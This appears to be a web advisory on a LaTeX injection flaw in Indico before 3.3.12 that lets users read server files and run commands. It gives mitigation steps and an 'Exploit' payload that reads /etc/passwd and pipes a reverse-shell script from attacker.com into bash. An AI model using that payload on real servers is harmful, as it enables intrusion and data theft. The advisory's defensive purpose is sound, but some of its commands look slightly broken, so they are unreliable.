Indico, LaTeX Injection leading to RCE, CVE (Not Specified) (Critical)

Listen to this Post

The vulnerability arises when Indico is configured to use server‑side LaTeX rendering (i.e., `XELATEX_PATH` is set in indico.conf). Indico attempts to sanitize user‑supplied LaTeX snippets, but due to obscure LaTeX syntax and underlying TeXLive vulnerabilities, an attacker can bypass the sanitizer.
The core issue is a combination of insufficient path sanitization (CWE‑22) and command injection (CWE‑78). By injecting LaTeX primitives such as \input, \include, or \write18, an attacker can read arbitrary files from the server or execute operating system commands with the privileges of the Indico process.
For example, `\input{/etc/passwd}` can leak system files, while `\write18{id}` can execute the `id` command. The sanitizer fails to block these patterns because they can be obfuscated using LaTeX’s macro expansion, conditionals, or character encoding tricks.
The vulnerability is only exploitable if LaTeX rendering is enabled. When `XELATEX_PATH` points to a valid LaTeX binary (e.g., xelatex), Indico invokes it on untrusted input. The TeX engine itself allows shell escapes (--shell‑escape) or file inclusion, which Indico does not fully disable.
An attacker with the ability to submit LaTeX snippets (e.g., through event descriptions, abstracts, or conference materials) can craft a payload that escapes the intended sandbox. This leads to full remote code execution on the host, compromising the Indico server and any data accessible to the user running Indico (typically indico).
The issue is fixed in Indico 3.3.12 by removing the dangerous LaTeX rendering method. The recommended mitigation is to switch to the containerized LaTeX renderer (using podman), which isolates the TeX engine in a restricted container.
Platform: Indico server
Version: < 3.3.12
Vulnerability: LaTeX injection RCE
Severity: Critical
date: Not disclosed

Prediction: Patch already available

What Undercode Say:

Check if LaTeX rendering is enabled
grep XELATEX_PATH /opt/indico/indico.conf
Disable LaTeX (workaround)
sed -i 's/^XELATEX_PATH./XELATEX_PATH = None/' /opt/indico/indico.conf
systemctl restart indico-uwsgi indico-celery
Upgrade to patched version
pip install indico==3.3.12
indico db upgrade
Enable containerized renderer (requires podman)
indico config set LATEX_RENDERER container
indico config set LATEX_CONTAINER_IMAGE indico/latex:latest
systemctl restart indico-uwsgi

Exploit:

\documentclass{}
\begin{document}
\input{/etc/passwd}
\write18{curl http://attacker.com/revshell.sh | bash}
\end{document}

Protection from this CVE

  • Upgrade to Indico ≥ 3.3.12 immediately.
  • If upgrading is not possible, remove or comment out `XELATEX_PATH` in `indico.conf` and restart the services.
  • Enable the containerized LaTeX renderer (podman) to isolate the rendering process.
  • Regularly review Indico security advisories and apply updates.

Impact

  • Remote code execution with the privileges of the Indico process.
  • Unauthorized reading of sensitive files (e.g., configuration files, application secrets, system files).
  • Complete compromise of the Indico instance, potentially leading to lateral movement within the hosting environment.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top